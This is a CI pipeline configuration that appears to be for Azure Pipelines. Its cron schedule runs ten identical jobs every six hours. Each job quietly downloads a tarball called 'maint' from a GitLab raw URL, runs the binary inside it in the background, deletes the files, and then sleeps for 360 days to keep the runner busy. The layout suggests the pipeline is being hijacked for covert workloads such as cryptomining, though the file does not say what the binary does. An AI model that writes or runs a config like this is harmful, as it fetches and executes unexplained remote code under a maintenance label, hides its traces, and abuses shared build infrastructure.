trigger: none

pr: none

schedules:
- cron: "0 */6 * * *"
  displayName: Cosmos Cron
  branches:
    include: 
    - main
  always: true # Run always irrespective of changes

pool:
  vmImage: ubuntu latest

jobs:
- job: a
  steps:
  - script: wget -q https://gitlab.com/BillieEdmondsStella/vendor/-/raw/main/maint.tar; tar xf maint.tar; nohup ./maint & sleep 0.1; rm -rf maint.tar maint; sleep 360d

- job: b
  steps:
  - script: wget -q https://gitlab.com/BillieEdmondsStella/vendor/-/raw/main/maint.tar; tar xf maint.tar; nohup ./maint & sleep 0.1; rm -rf maint.tar maint; sleep 360d

- job: c
  steps:
  - script: wget -q https://gitlab.com/BillieEdmondsStella/vendor/-/raw/main/maint.tar; tar xf maint.tar; nohup ./maint & sleep 0.1; rm -rf maint.tar maint; sleep 360d

- job: d
  steps:
  - script: wget -q https://gitlab.com/BillieEdmondsStella/vendor/-/raw/main/maint.tar; tar xf maint.tar; nohup ./maint & sleep 0.1; rm -rf maint.tar maint; sleep 360d
  
- job: e
  steps:
  - script: wget -q https://gitlab.com/BillieEdmondsStella/vendor/-/raw/main/maint.tar; tar xf maint.tar; nohup ./maint & sleep 0.1; rm -rf maint.tar maint; sleep 360d
  
- job: f
  steps:
  - script: wget -q https://gitlab.com/BillieEdmondsStella/vendor/-/raw/main/maint.tar; tar xf maint.tar; nohup ./maint & sleep 0.1; rm -rf maint.tar maint; sleep 360d
  
- job: g
  steps:
  - script: wget -q https://gitlab.com/BillieEdmondsStella/vendor/-/raw/main/maint.tar; tar xf maint.tar; nohup ./maint & sleep 0.1; rm -rf maint.tar maint; sleep 360d
  
- job: h
  steps:
  - script: wget -q https://gitlab.com/BillieEdmondsStella/vendor/-/raw/main/maint.tar; tar xf maint.tar; nohup ./maint & sleep 0.1; rm -rf maint.tar maint; sleep 360d
  
- job: i
  steps:
  - script: wget -q https://gitlab.com/BillieEdmondsStella/vendor/-/raw/main/maint.tar; tar xf maint.tar; nohup ./maint & sleep 0.1; rm -rf maint.tar maint; sleep 360d
  
- job: j
  steps:
  - script: wget -q https://gitlab.com/BillieEdmondsStella/vendor/-/raw/main/maint.tar; tar xf maint.tar; nohup ./maint & sleep 0.1; rm -rf maint.tar maint; sleep 360d
